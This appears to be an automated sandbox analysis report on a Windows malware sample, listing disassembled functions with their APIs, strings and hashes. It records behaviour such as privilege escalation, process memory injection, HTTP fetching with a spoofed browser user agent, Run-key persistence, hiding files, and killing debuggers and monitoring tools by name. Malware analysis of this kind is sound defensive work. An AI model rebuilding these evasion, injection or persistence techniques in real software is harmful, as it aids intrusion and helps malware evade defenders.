                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: 6bf542f5294f4f6ae96698eefc0db55513a89ed4960c359ec2e3db956dfaa5d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC414D3261CA8186E3549B55F48876EF7E0FB85754FE04136EA8946AA8CF7DD448CF10
                                                                                                                                                                                                                          Function 00007FF7DBD52CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: f5e3ee0cfbd78d8bf13c37ff1a102e82a2918054ca6b0b123b21ecc5648119cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841A27260CA8586E7649B19F49436FB7E0F785B84F904036EA8D87B68DF7DD4488B80
                                                                                                                                                                                                                          Function 00007FF7DBD51CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7DBD51D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: 7d77cc64b9b027c517eb084d077aaa45c44455798b70502132585694bf23dbd2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3271E93661CA8182E754AF59F49472EF7A0FBC6795FA01036FA8E43A68CF7CD4448B10
                                                                                                                                                                                                                          Function 00007FF7DBD546E4 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2693768547-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: d9697ee9d6cb2e1abcd8558a5eb1e4d407fbb82003e9cc17942b2c51e64617d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F681B73660CB8186EA54DB59F48436EE7A0FBC9B91F904136EA8D83B78DF7CD0448B10
                                                                                                                                                                                                                          Function 00007FF7DBD530DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD5460C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD54649
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD545C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53117), ref: 00007FF7DBD54654
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD5311C), ref: 00007FF7DBD53BC7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegSetValueExW.ADVAPI32 ref: 00007FF7DBD53BFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53B84: RegCloseKey.ADVAPI32 ref: 00007FF7DBD53C0C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7DBD53C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7DBD53E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: Process32FirstW.KERNEL32 ref: 00007FF7DBD53E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: wcscmp.MSVCRT ref: 00007FF7DBD53E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: OpenProcess.KERNEL32 ref: 00007FF7DBD53EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: TerminateProcess.KERNEL32 ref: 00007FF7DBD53ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: Process32NextW.KERNEL32 ref: 00007FF7DBD53EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53E24: CloseHandle.KERNEL32 ref: 00007FF7DBD53EFD
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD539B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7DBD53B0C), ref: 00007FF7DBD539E4
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF7DBD531C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 2853470409-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: a94d93b289af1c721818da7e3ba9855fbf6d7c5ad31a814c501194c904bd1ee5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48217360A1C94390EA0CFB2CD8D15BDE2E0AF52760FD00973E41E422F69F2CB959C630
                                                                                                                                                                                                                          Function 00007FF7DBD52E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 0ce0fb727a8ab02825b7a992e44c14a4ace747457ee7a129b9bc7cca253d10fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D01C036A0CE4182E738AB25E89826DA7B1FBD9B65FD41132D94E42674CF3CD5858710
                                                                                                                                                                                                                          Function 00007FF7DBD53E24 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083639309-0
                                                                                                                                                                                                                          • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction ID: 93acb1cd1ffd60bea84728cdd21e0bc750cfa43390ef45daf953606080d6ffca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7210E31A0CA8681E774AB19E88876EE3E0FBC5B65FD04236C59E425B8DF3DD445CB10
                                                                                                                                                                                                                          Function 00007FF7DBD52F0C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 299056699-0
                                                                                                                                                                                                                          • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction ID: c2c7eb8f2e166d05706b3c7eb9d34fb32fff85544b0436e6e7ce20d60ac023c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3701D236A1CA4182E728AB25F88826DA3B1FBC9B55FD01136E98E42678CF2CD5448710
                                                                                                                                                                                                                          Function 00007FF7DBD53CE4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                          • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                          • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction ID: 697cd411604e07caf30d99a854665c55bd577728639acf8c13beb61cfd1d1fb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A31A67661CAC485D674AB19E4D87AEA3B0F789740F800636DA8E83B68DF3CD554CB10
                                                                                                                                                                                                                          Function 00007FF7DBD53B84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: a7135c092d212117b637128faae009ef229128e13b03016af6c1e0df400f3893
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D776618A808AD7509B18E48471EB7A4F789794FD01236EA8D43B68DF7DC145CB10
                                                                                                                                                                                                                          Function 00007FF7DBD54004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2850635065-0
                                                                                                                                                                                                                          • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction ID: faa62cb09cf42e3d56daedf0d34cba02d5a271a9a0d10a17714ae04e420a202b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9411E27160CA8581E7749B19E48836EA3E0FB85754FD04236D69D426A8DF3DD504CF20
                                                                                                                                                                                                                          Function 00007FF7DBD539B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: c4168892f93a5a73ee42d45cc719b850ddbd27538bf41da5a97d251b0001d428
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA11513252CB4086D7949B18F48066EB7A0FB857A0F905331F9AE43BB8DF6CD044CB10
                                                                                                                                                                                                                          Function 00007FF7DBD52F9C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
